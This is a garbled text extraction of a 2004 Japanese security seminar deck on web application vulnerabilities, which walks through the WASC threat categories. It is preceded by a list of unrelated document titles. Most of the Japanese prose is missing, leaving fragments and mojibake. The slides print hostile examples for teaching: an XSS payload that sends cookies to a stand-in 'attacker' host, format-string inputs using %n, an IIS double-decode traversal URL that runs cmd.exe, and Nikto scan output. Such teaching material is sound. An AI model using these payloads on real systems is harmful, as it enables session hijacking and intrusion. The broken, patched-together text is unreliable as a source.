shio_20041004.PDF



Similar documents
はじめに! 本 セッションは Webシステムにまつわる 脆 弱 性 とはどういったものなのか どういう 危 険 性 があるのか またどのような 対 策 が 必 要 とされるのかについ て WebサービスおよびWebアプリケーションレイヤにターゲットを 絞 り 網 羅 的 に 解 説 するものである!

Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 3 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved.

shio_ r2.ppt[読み取り専用]

Web Web ( (SOAP (SOAP/http (WSDL UDDI 1. 2.XML 3. (XDoS http, https SOAP XML Web/App ( App

第2回_416.ppt

Windows と Linux のセキュリティ: 噂の真相

5-5_arai_JPNICSecSemi_XssCsrf_CM_ PDF

25 About what prevent spoofing of misusing a session information

"CAS を利用した Single Sign On 環境の構築"

Dec , IS p. 1/60

main.dvi

CAS Yale Open Source software Authentication Authorization (nu-cas) Backend Database Authentication Authorization Powered by A

Oracle Application Server 10g Release 3(10.1.3)Oracle HTTP Serverの概要

FileMaker Server Getting Started Guide

内閣官房情報セキュリティセンター(NISC)

Oracle Application Server 10gリリース2( )Oracle HTTP Serverの概要

2004 SYN/ACK SYN Flood G01P014-6

"CAS を利用した Single Sign On 環境の構築"

FileMaker Server Getting Started Guide

¥Í¥Ã¥È¥ï¡¼¥¯¥×¥í¥°¥é¥ß¥ó¥°ÆÃÏÀ

FileMaker Help-M2 Template Guide

FileMaker Server Help

FileMaker Server Help

"CAS を利用した Single Sign On 環境の構築"

XMLアクセス機能説明書

Epson Print Admin

FileMaker Server Getting Started Guide

FileMaker Server 8 Advanced Web Publishing Installation Guide

目次〜.indd

FileMaker Server 9 Getting Started Guide

FileMaker Server 10 ヘルプ

スライド 1

スライド 1

Windows2000 Edge Components V Edge Components V Java Edge Components

untitled

FileMaker Server 16 インストールおよび構成ガイド

<Documents Title Here>

Oracle Secure Enterprise Search 10gを使用したセキュアな検索

iPhone/iPad/Android(TM) とベリサイン アイデンティティプロテクション(VIP)エンタープライズゲートウェイとの組み合わせによるL2TP+IPsecのワンタイムパスワード設定例


¥Í¥Ã¥È¥ï¡¼¥¯¥×¥í¥°¥é¥ß¥ó¥°ÆÃÏÀ

HTTP Web Web RFC2616 HTTP/1.1 Web Apache Tomcat (Servlet ) XML Xindice Tomcat 6-2

IW2002-B5 1 Internet Week ( ) 9:30 12:30 ( ) Copyright 2002 All Rights Reserved, by Seiji Kumagai ADSL FTTH 24 IP LAN

untitled

SQL Web Web SQL SQL SQL SQL SQL SQL SQL SQL SQL SQL SQL i

お客様システムにおけるセキュリティ施策

1 ARENA DNS CSR ID ( ).. I

FileMaker Server 15 入門ガイド

wide94.dvi

WIDE 1

インストール取扱説明書

Session Fixation ID ID ID ID WhiteHat Security 1) 12% Session Fixation MBSD 2) Session Fixation Session Fixation ID ID ID ID ID Session Fixation ID ID

Microsoft PowerPoint - 情報システム pptx

Testing XML Performance

Phishing対策のためのMutualアクセス認証 〜 MutualTestFoxの公開について 〜

Web STEPS Web Web Form Cookie HTTP STEPS Web

9iAS_DEV.PDF

Epson Print Admin


第3回_416.ppt

Copyright

SOC Report

FileMaker Instant Web Publishing Guide

10/ / /30 3. ( ) 11/ 6 4. UNIX + C socket 11/13 5. ( ) C 11/20 6. http, CGI Perl 11/27 7. ( ) Perl 12/ 4 8. Windows Winsock 12/11 9. JAV

Oracle Calendar Oracle Collaboration Suite 2(9.0.4) Creation Date: Jun 04, 2003 Last Update: Nov 18, 2003 Version:

ohp.mgp

untitled

ウイルスバスター ビジネスセキュリティ インストールガイド

FileMaker Server 9 Getting Started Guide

untitled

Microsoft Word - PSB導入ガイド_ docx

IW2001-B2 1 Internet Week 2001 ( ) Copyright 2001 All Rights Reserved, by Seiji Kumagai IW2001-B2 2 CodeRed Copyright 2001 All Rights

shibasaki(印刷用)

WebDAV WebDAV WebDAV WebDAV HTTP/

PLESK_START_UP_GUIDE.indd

Oracle Application Server 10g( )インストール手順書

Teradici Corporation # Canada Way, Burnaby, BC V5G 4X8 Canada p f Teradici Corporation Teradi


Plan of Talk CAS CAS 2 CAS Single Sign On CAS CAS 2 CAS Aug. 19, 2005 NII p. 2/32

untitled

4 BIG-IP v9.xldapactive Directory (AD) RADIUSTACACS+ BIG-IP 4 BIG-IP GUI CPU WAN Optimization ModuleWOM WOM BIG-IP BIG-IP SSL Logical Volume Manager B

最新 Web 脆弱性トレンドレポート (08.0) ~08.0. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 08 年

Windows Oracle -Web - Copyright Oracle Corporation Japan, All rights reserved.

FileMaker Instant Web Publishing Guide

<Documents Title Here>

チェックしておきたいぜい弱性情報2009< >

EMC® RepliStor® for Microsoft Windows バージョン 6.2 SP2インストール・ガイド

Mac OS X Server Windows NTからの移行

Copyright


今企業が取るべきセキュリティ対策とは策

untitled

橡t15-shibuya.kashiwa.ppt

Oracle Fail Safe For Windows NT and Windows 2000 リリース・ノート、リリース 3.1.2

FirePass Edge Client TM Edge Client LAN Edge Client 7.0 Edge Client Edge Client Edge Client Edge Client Edge Client Edge Client LAN Edge Client VPN Wi

Oracle Application Server 10g(9


ii II Web Web HTML CSS PHP MySQL Web Web CSS JavaScript Web SQL Web

Oracle Identity Managementの概要およびアーキテクチャ

Oracle Change Management Pack, Oracle Diagnostics Pack, Oracle Tuning Packインストレーション・ガイド リリース2.2

Transcription:

JPNIC JPCERT/CC 2004 Web 2004 10 4 <shio@st.rim.or.jp>

Web Web Web WASC Web Application Security Consortium 7 Web Security Threat Classification Web URL 2

...?? It depends!? It depends!??? 3

? It depends!... 4

Web Web Web... Crosssite Scripting SQL... OS SYN Flood IP ARP TCP Reset......... 5

Web ID HTTP LDAP Web OS SQL SSI XPath WASC Web Security Threat Classification 6

Authentication...... Brute Force Insufficient Authentication Weak Password Recovery Validation 7

Authentication ID Web ID ID 8

Authentication URL URL URL... Web /admin/ Security Through Obscurity... 9

Authentication Web Web...... Web 10

Authorization...... ID Credential/Session Prediction Insufficient Authorization Insufficient Session Expiration Session Fixation 11

Web HTTP TCP ID ID ID ID 12

Authorization ID ID ID ID ID ID ID ID ID ID 13

ID SID:1234 SID:1235 ID SID:1235 SID:1234 SID:1234 SID:1235 SID:1235 SID:1235 14

Authorization URL URL URL... Security Through Obscurity... 15

Authorization ID Web ID... XSS back SSL 16

Authorization ID fix Web ID ID ID HTML URL XSS Cross-site Scripting Cookie Web ID ID Web Web ID ID ID IP 17

SID:1234 ID SID:1234 SID 1234 SID:1234 SID:1234 SID:1234 ID 1234 SID 1234 HTML ID SID:1234 SID 1234 18

Client-side Attacks Web Web Content Spoofing Cross-site Scripting 19

Client-side Attacks Web URL URL URL Web... URL URL 20

Client-side Attacks XSS Web JavaScript/VBscript Web Web IE Web Cookie ID Web 21

http://server/cgi?name=joe Cookie Hello Joe! Cookie... http://server/cgi?name =<script>document.lo cation='http://attacker /getcookie?'+document.cookie</script> Cookie... Cookie <script>document. location='http://att acker/getcookie?'+ document.cookie</ script> 22

Command Execution Web...... Buffer Overflow Format String Attack LDAP Injection OS Commanding SQL Injection SSI Injection XPath Injection 23

Command Execution C/C++ CGI C Web 24

25 BOF

Command Execution... printf() %s, %d, %x,... printf(buf); buf C/C++ CGI C %x %n 4 Web 26

printf("%x", 1); 1 16 printf(buf); buf "%x" 16 27

int i; printf("abcd%n", &i); i 4 printf(buf); buf "0xbffff658%x%x%x%x...%n" 0xbffff658 N 28

Command Execution LDAP LDAP LDAP Web LDAP 29

Command Execution OS OS Web Perl C PHP... 30

Command Execution SQL SQL Web Union... 31

Command Execution SSI SSI HTML Web HTML Web... SSI OS SSI 32

Command Execution XPath XPath... XML XPath XML Web 33

Information Disclosure Web... Directory Indexing Information Leakage Path Traversal Predictable Resource Location 34

Information Disclosure URL Web Apache 1.3; GET //////////... HTTP/1.0 Google Web 35

Information Disclosure Web HTML?... Web IP Web 36

Information Disclosure Traversal... Unicode UTF-8 NULL %00 OS Web 37

Information Disclosure....bak.old.org.orig....conf.cfg.config....dat.data... /admin/ /backup/ /logs/... 38

Nikto Web Nikto http://www.cirt.net/code/nikto.shtml $ perl nikto.pl -nolookup -host 192.168.183.12 --------------------------------------------------------------------------- - Nikto 1.34/1.29 - www.cirt.net + Target IP: 192.168.183.12 + Target Hostname: 192.168.183.12 + Target Port: 80 + Start Time: Thu Sep 30 07:27:42 2004 ---------------------------------------------------------------------------... + Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK,UNLOCK + /<script>alert('vulnerable')</script>.shtml - Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02. (GET)... + /blahb.ida - Reveals physical path....... + /xxxxx.htw - Server may be vulnerable to a Webhits.dll arbitrary file retrieval.... + /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir - IIS is vulnerable to a double-decode bug, which allows...... + /_vti_bin/fpcount.exe - Frontpage counter CGI has been found.......... + 2648 items checked - 20 item(s) found on remote host(s) + End Time: Thu Sep 30 07:28:28 2004 (46 seconds) --------------------------------------------------------------------------- + 1 host(s) tested 39

Logical Attacks Web... Web Abuse of Functionality Denial of Service Insufficient Anti-automation Insufficient Process Validation 40

Logical Attacks Web Web Web Web hidden Web Frontpage Server Extensions IIS WebDAV IIS hidden 41

Logical Attacks Web...... SQL Web Web 42

Logical Attacks Web 43

Logical Attacks hidden Cookie... 44

HTTP Response Splitting Location Web Web Server/Application Fingerprinting Cookie Web Web 45

...??? ID??? SQL?... Web Web 46

Web...!! 47

WASC Web Security Threat Classification http://www.webappsec.org/threat.html OWASP Top Ten http://www.owasp.org/documentation/topten.html OWASP A Guide to Building Secure Web Applications http://www.owasp.org/documentation/guide/guide_about.html @IT Web http://www.atmarkit.co.jp/fsecurity/rensai/webhole01/webhole01.htm @IT http://www.atmarkit.co.jp/fsecurity/special/30xss/xss01.html HTTP Response Splitting http://www.sanctuminc.com/pdf/whitepaper_httpresponse.pdf The Google Hackers Guide http://johnny.ihackstuff.com/security/premium/the_google_hackers_guide_ v1.0.pdf 48